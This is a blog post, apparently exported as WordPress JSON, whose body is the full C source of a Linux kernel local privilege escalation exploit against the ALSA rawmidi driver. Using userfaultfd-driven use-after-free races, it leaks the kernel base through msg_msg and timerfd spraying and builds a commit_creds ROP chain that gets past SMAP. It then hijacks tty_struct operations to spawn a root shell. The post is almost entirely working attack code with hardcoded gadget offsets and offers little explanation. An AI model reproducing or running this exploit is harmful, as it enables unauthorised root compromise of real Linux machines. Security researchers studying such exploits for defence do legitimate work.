\/\/ gcc -o exploit exploit.c -masm=intel -static -s -lpthread
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys\/types.h>
#include <sys\/stat.h>
#include <fcntl.h>
#include <sys\/ioctl.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sound\/asound.h>
#include <sys\/mman.h>
#include <sys\/syscall.h>
#include <linux\/userfaultfd.h>
#include <sys\/timerfd.h>
#include <sys\/ipc.h>
#include <sys\/msg.h>
#include <pthread.h>
#include <poll.h><\/p>\n
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \\
} while (0)<\/p>\n
#define ADDRESS_PAGE_FAULT1 0x1337000
#define ADDRESS_PAGE_FAULT2 0x3331000
#define ADDRESS_PAGE_FAULT3 0x5551000
#define PAGE_SIZE 0x1000
#define DRIVER_RAWMIDI “\/dev\/snd\/midiC0D0”<\/p>\n
#define SNDRV_RAWMIDI_STREAM_OUTPUT 0<\/p>\n
uint32_t uffd;
uint32_t fd1, fd2, fd3;
uint64_t next;
uint64_t fake_table;<\/p>\n
pthread_t thread[6];<\/p>\n
bool release_page_fault = false;<\/p>\n
static void *page;<\/p>\n
unsigned long pivot;
unsigned long kernel_base;
unsigned long timerfd_tmrproc;<\/p>\n
unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;<\/p>\n
struct args_trigger
{
char *addr;
int size;
uint32_t fd;
};<\/p>\n
void hexdump(uint64_t *buf, uint64_t size)
{
for (int i = 0; i < size \/ 8; i += 2)
{
printf(“0x%x “, i * 8);
printf(“%016lx %016lx\\n”, buf[i], buf[i + 1]);
}
}<\/p>\n
static void save_state()
{
__asm__ __volatile__(
“movq %0, cs;”
“movq %1, ss;”
“pushfq;”
“popq %2;”
“movq %3, %%rsp\\n”
: “=r” (usr_cs), “=r” (usr_ss), “=r” (usr_rflags), “=r” (usr_sp) : : “memory” );
}<\/p>\n
static void getRootShell()
{
if(getuid())
{
printf(“[-] Failed to get a root”);
exit(0);
}<\/p>\n
printf(“[+] uid : %d\\n”, getuid());
printf(“[+] Got root.\\n”);<\/p>\n
execl(“\/bin\/sh”, “sh”, NULL);
}<\/p>\n
void register_userfaultfd(uint64_t *range)
{
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;<\/p>\n
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);<\/p>\n
if (uffd == -1)
{
perror(“[-] userfaultfd”);
exit(0);
}<\/p>\n
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;<\/p>\n
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
printf(“[*] Start monitoring range: %p – %p\\n”, page, page + PAGE_SIZE);<\/p>\n
uffdio_register.range.start = (uint64_t) range;
uffdio_register.range.len = PAGE_SIZE;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;<\/p>\n
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
puts(“[+] Userfaultfd registered”);
}<\/p>\n
void *handler_userfaultfd(void *args)
{
uint64_t uffd = *(uint64_t *)args;<\/p>\n
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
uint64_t nread;
void *page2 = NULL;<\/p>\n
if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
{
perror(“[-] mmap()”);
exit(0);
}<\/p>\n
uint64_t m_ts = 0x000000000000ffff;
memcpy(page2, (char *) &m_ts, 8);<\/p>\n
while (true)
{
struct pollfd pollfd;
int nready;<\/p>\n
pollfd.fd = uffd;
pollfd.events = POLLIN;<\/p>\n
nready = poll(&pollfd, 1, -1);<\/p>\n
if (nready == -1)
{
perror(“[-] poll”);
exit(0);
}<\/p>\n
nread = read(uffd, &msg, sizeof(msg));<\/p>\n
if (nread == 0)
{
perror(“[-] EOF on userfaultfd!\\n”);
exit(0);
}<\/p>\n
if (nread == -1)
{
perror(“[-] read”);
exit(0);
}<\/p>\n
char *page_fault_location = (char *)msg.arg.pagefault.address;<\/p>\n
if (msg.event != UFFD_EVENT_PAGEFAULT)
{
perror(“[-] Unexpected event on userfaultfd”);
exit(0);
}<\/p>\n
if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)
{
printf(“[+] Page Fault triggered on address 0x%llx\\n”, msg.arg.pagefault.address);<\/p>\n
if(msg.arg.pagefault.address == (void *)0x5551000)
{
memcpy(page2, (char *) &fake_table, 8);
}<\/p>\n
while (release_page_fault == false);<\/p>\n
uffdio_copy.src = (uint64_t) page2;
uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE – 1);
uffdio_copy.len = PAGE_SIZE;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;<\/p>\n
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
release_page_fault = false;
}
}<\/p>\n
close(uffd);
puts(“[+] Page fault thread finished”);
}<\/p>\n
void *trigger_userfaultfd(struct args_trigger *args)
{
char *addr = (char *) args->addr;
int size = args->size;
uint32_t fd = (uint64_t) args->fd;<\/p>\n
write(fd, addr, size);
}<\/p>\n
void send_msg(int qid, const void *msg_buf, size_t size, long mtype)
{
struct msgbuf
{
long mtype;
char mtext[size – 0x30];
} msg;<\/p>\n
msg.mtype = mtype;
memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));<\/p>\n
if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
{
perror(“msgsnd”);
exit(1);
}
}<\/p>\n
void *recv_msg(int qid, size_t size)
{
void *memdump = malloc(size);<\/p>\n
if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)
{
perror(“msgrcv”);
return NULL;
}<\/p>\n
return memdump;
}<\/p>\n
void build_rop(char *buf)
{
uint64_t *rop = (uint64_t *)&buf[0x0];
int k = 0;<\/p>\n
\/* commit_creds(prepare_kernel_cred(0)) *\/
rop[k++] = kernel_base + 0x15e8; \/\/ pop rdi ; ret
rop[k++] = 0x0;
rop[k++] = kernel_base + 0x8a800; \/\/ prepare_kernel_cred
rop[k++] = kernel_base + 0x49fb8; \/\/ pop rdx ; ret
rop[k++] = 0x8;
rop[k++] = kernel_base + 0xa6b081; \/\/ cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret
rop[k++] = kernel_base + 0x3dfdb4; \/\/ mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret
rop[k++] = kernel_base + 0x8a3c0; \/\/ commit_creds<\/p>\n
\/* kpti trampoline *\/
rop[k++] = kernel_base + 0xc00a45; \/\/ swapgs_restore_regs_and_return_to_usermode + 22
rop[k++] = 0x0; \/\/ rax
rop[k++] = 0x0; \/\/ rdi<\/p>\n
rop[k++] = (unsigned long)&getRootShell;
rop[k++] = (unsigned long)usr_cs;
rop[k++] = (unsigned long)usr_rflags;
rop[k++] = (unsigned long)usr_sp;
rop[k++] = (unsigned long)usr_ss;<\/p>\n
uint64_t *func_table = (uint64_t *)&buf[0x100];
for (size_t i = 0; i < 12; i++)
{
if (i == 4)
{
*func_table++ = kernel_base + 0x1e; \/\/ ret;
continue;
}<\/p>\n
if (i == 5)
{
*func_table++ = kernel_base + 0x1e; \/\/ ret
continue;
}<\/p>\n
if (i == 6)
{
*func_table++ = kernel_base + 0x1e; \/\/ ret
continue;
}<\/p>\n
*func_table++ = 0xdeadbeefdeadbe00 + i;
}<\/p>\n
*func_table = pivot;
}<\/p>\n
void pin_cpu(long cpu_id)
{
cpu_set_t mask;<\/p>\n
CPU_ZERO(&mask);
CPU_SET(cpu_id, &mask);<\/p>\n
if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
{
err(“`sched_setaffinity()` failed: %s”, strerror(errno));
}<\/p>\n
return;
}<\/p>\n
void main(void)
{
pin_cpu(0);<\/p>\n
struct snd_rawmidi_params srp;<\/p>\n
save_state();<\/p>\n
\/* ===================== [ SETP 1 – KASLR Leak ] ===================== *\/<\/p>\n
puts(“[+] STEP 1 : KASLR leak”);
fd1 = open(DRIVER_RAWMIDI, O_RDWR);<\/p>\n
if (fd1 < 0)
{
perror(“[-] open”);
exit(0);
}<\/p>\n
puts(“[+] Opening rawmidi”);<\/p>\n
int qid[2];
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror(“msgget”);
exit(1);
}<\/p>\n
struct itimerspec its;<\/p>\n
its.it_interval.tv_sec = 0;
its.it_interval.tv_nsec = 0;
its.it_value.tv_sec = 9999;
its.it_value.tv_nsec = 0;<\/p>\n
int tfd[256];<\/p>\n
for(int i = 0; i < 256 \/ 2; i++)
{
tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(tfd[i], 0, &its, 0);
}<\/p>\n
if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
{
perror(“[-] mmap()”);
exit(0);
}<\/p>\n
puts(“[+] Mapping two pages”);<\/p>\n
char *addr = page;
memset(addr, ‘A’, PAGE_SIZE);<\/p>\n
puts(“[+] Registering one page userfaultfd”); <\/p>\n
\/* Registering mapped area *\/
register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);<\/p>\n
puts(“[+] Raising up the handler for userfaultfd”);<\/p>\n
\/* Handler for userfault *\/
pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);<\/p>\n
\/* Create one object by size 256 *\/
srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
srp.buffer_size = 240;
srp.avail_min = 1;
uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Created one object by size 256”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
struct args_trigger args;
args.addr = addr + PAGE_SIZE – 0x18;
args.size = 0x18 + 0x8;
args.fd= fd1;<\/p>\n
\/* Blocking before object created by size 256 in userfault *\/
pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);
puts(“[+] Triggering userfaultfd”);<\/p>\n
\/* Deleting before object created by size 256 generating an UAF *\/
srp.buffer_size = 250;
err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Deleting before object created by size 256 generating UAF”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
\/* send_msg ‘A’ *\/
char buf[0xf8 – 0x30];
memset(buf, 0x41, sizeof(buf));
send_msg(qid[0], buf, 0xf8, 1);<\/p>\n
puts(“[+] Allocate msg_msg in kmalloc-256”);<\/p>\n
printf(“[*] Waiting for userfaultd to finish ..\\n”);
release_page_fault = true;<\/p>\n
\/* spray timerfd_ctx in kmalloc-256 *\/
for(int i = 256 \/ 2; i < 256; i++)
{
tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(tfd[i], 0, &its, 0);
}<\/p>\n
puts(“[+] Allocate timerfd_ctx in kmalloc-256”);<\/p>\n
while(release_page_fault == true);
printf(“[+] Page fault lock released\\n”);<\/p>\n
uint64_t *leak = recv_msg(qid[0], 0x2000);<\/p>\n
\/\/ hexdump(leak, 0x2000);<\/p>\n
timerfd_tmrproc = *(leak + (0x200 \/ sizeof(uint64_t)));
kernel_base = timerfd_tmrproc – 0x2201f0;
pivot = kernel_base + 0x8fc625; \/\/ push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret<\/p>\n
printf(“[+] timerfd_tmrproc addr : 0x%lx\\n”, timerfd_tmrproc);
printf(“[+] kernel_base addr : 0x%lx\\n”, kernel_base);
printf(“[+] pivot addr : 0x%lx\\n”, pivot);<\/p>\n
for(int i = 0; i < 256; i++)
{
close(tfd[i]);
}<\/p>\n
close(fd1);
puts(“[+] Close rawmidi”);<\/p>\n
\/* ===================== [ SETP 2 – SMAP Bypass ] ===================== *\/<\/p>\n
puts(“\\n[+] STEP 2 : SMAP bypass”);<\/p>\n
release_page_fault = false;<\/p>\n
fd2 = open(DRIVER_RAWMIDI, O_RDWR);<\/p>\n
if (fd2 < 0)
{
perror(“[-] open”);
exit(0);
}<\/p>\n
puts(“[+] Opening rawmidi”);<\/p>\n
if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror(“msgget”);
exit(1);
}<\/p>\n
if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
{
perror(“[-] mmap()”);
exit(0);
}<\/p>\n
puts(“[+] Mapping two pages”);<\/p>\n
addr = page;
memset(addr, ‘B’, PAGE_SIZE);<\/p>\n
puts(“[+] Registering one page userfaultfd”); <\/p>\n
\/* Registering mapped area *\/
register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);<\/p>\n
puts(“[+] Raising up the handler for userfaultfd”);<\/p>\n
\/* Handler for userfault *\/
pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);<\/p>\n
\/* Create one object by size 512 *\/
srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
srp.buffer_size = 500;
srp.avail_min = 1;
err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Created one object by size 512”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}
args.addr = addr + PAGE_SIZE – 0x18;
args.size = 0x18 + 0x8;
args.fd= fd2;<\/p>\n
\/* Blocking before object created by size 512 in userfault *\/
pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);
puts(“[+] Triggering userfaultfd”);<\/p>\n
\/* Deleting before object created by size 512 generating an UAF *\/
srp.buffer_size = 90;
err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Deleting before object created by size 512 generating UAF”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
\/* rop spray in kmalloc-512 *\/
char secondary_buf[0x1ea – 0x30];
memset(secondary_buf, 0, sizeof(secondary_buf));
build_rop(secondary_buf);<\/p>\n
printf(“[*] Waiting for userfaultd to finish ..\\n”);
release_page_fault = true;<\/p>\n
for(int i = 0; i < 0x20; i++)
{
send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);
}<\/p>\n
puts(“[+] Spray ROP Chain in kmalloc-512”);<\/p>\n
while(release_page_fault == true);
printf(“[+] Page fault lock released\\n”);<\/p>\n
uint64_t *leak2 = recv_msg(qid[1], 0x2000);
next = *(leak2 + (0x1d8 \/ sizeof(uint64_t))) + 0x30;
fake_table = next + 0x100;<\/p>\n
printf(“[+] msg_msg->m_list.next leak : 0x%lx\\n”, next – 0x30);
printf(“[+] Fake tty_struct->ops function table: 0x%lx\\n”, fake_table);<\/p>\n
\/\/ hexdump(leak2, 0x2000);<\/p>\n
close(fd2);
puts(“[+] Close rawmidi”);<\/p>\n
\/* ===================== [ SETP 3 – tty_struct->ops overwrite ] ===================== *\/<\/p>\n
puts(“\\n[+] STEP 3 : Fake tty_struct->ops overwrite”);<\/p>\n
release_page_fault = false;<\/p>\n
fd3 = open(DRIVER_RAWMIDI, O_RDWR);<\/p>\n
if (fd3 < 0)
{
perror(“[-] open”);
exit(0);
}<\/p>\n
puts(“[+] Re-opening rawmidi”);<\/p>\n
if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
{
perror(“[-] mmap()”);
exit(0);
}<\/p>\n
puts(“[+] Mapping two pages”);<\/p>\n
addr = page;
memset(addr, ‘C’, PAGE_SIZE);<\/p>\n
puts(“[+] Registering one page userfaultfd”); <\/p>\n
\/* Registering mapped area *\/
register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);<\/p>\n
puts(“[+] Raising up the handler for userfaultfd”);<\/p>\n
\/* Handler for userfault *\/
pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);<\/p>\n
\/* Create one object by size 800 *\/
srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
srp.buffer_size = 800;
srp.avail_min = 1;
err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Created one object by kmalloc-1024”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
args.addr = addr + PAGE_SIZE – 0x18;
args.size = 0x18 + 0x8;
args.fd= fd3;<\/p>\n
\/* Blocking before object created by size 1024 in userfault *\/
pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);
puts(“[+] Triggering userfaultfd”);<\/p>\n
\/* Deleting before object created by size 1024 generating an UAF *\/
srp.buffer_size = 90;
err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);<\/p>\n
puts(“[+] Deleting before object created by size 1024 generating UAF”);<\/p>\n
if (err < 0)
{
perror(“[-] ioctl”);
exit(0);
}<\/p>\n
int spray[256];<\/p>\n
\/* tty_struct spray *\/
for(int i = 0; i < 256; i++)
{
spray[i] = open(“\/dev\/ptmx”, O_RDONLY | O_NOCTTY);<\/p>\n
if(spray[i] < 0)
{
printf(“[-] Failed open \/dev\/ptmx\\n”);
}
}<\/p>\n
puts(“[+] Allocate tty_struct in kmalloc-1024”);<\/p>\n
release_page_fault = true;<\/p>\n
while(release_page_fault == true);
puts(“[+] Page fault lock released”);<\/p>\n
for(int i = 0; i < 256; i++)
{
ioctl(spray[i], 0, next – 8);
}
}<\/p>\n","protected":false},"excerpt":{"rendered":"
\/\/ gcc -o exploit exploit.c -masm=intel -static -s -lpthread#define _GNU_SOURCE#include <stdio.h>#include <stdlib.h>#include <stdbool.h>#include <sys\/types.h>#include <sys\/stat.h>#include <fcntl.h>#include <sys\/ioctl.h>#include <errno.h>#include <string.h>#include <unistd.h>#include <stdint.h>#include <sound\/asound.h>#include <sys\/mman.h>#include <sys\/syscall.h>#include <linux\/userfaultfd.h>#include <sys\/timerfd.h>#include <sys\/ipc.h>#include <sys\/msg.h>#include <pthread.h>#include <poll.h> #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \\} while (0) #define ADDRESS_PAGE_FAULT1 0x1337000#define ADDRESS_PAGE_FAULT2 0x3331000#define ADDRESS_PAGE_FAULT3 0x5551000#define PAGE_SIZE 0x1000#define DRIVER_RAWMIDI “\/dev\/snd\/midiC0D0” #define SNDRV_RAWMIDI_STREAM_OUTPUT 0 uint32_t uffd;uint32_t …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59440","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59440"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59440\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59440"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}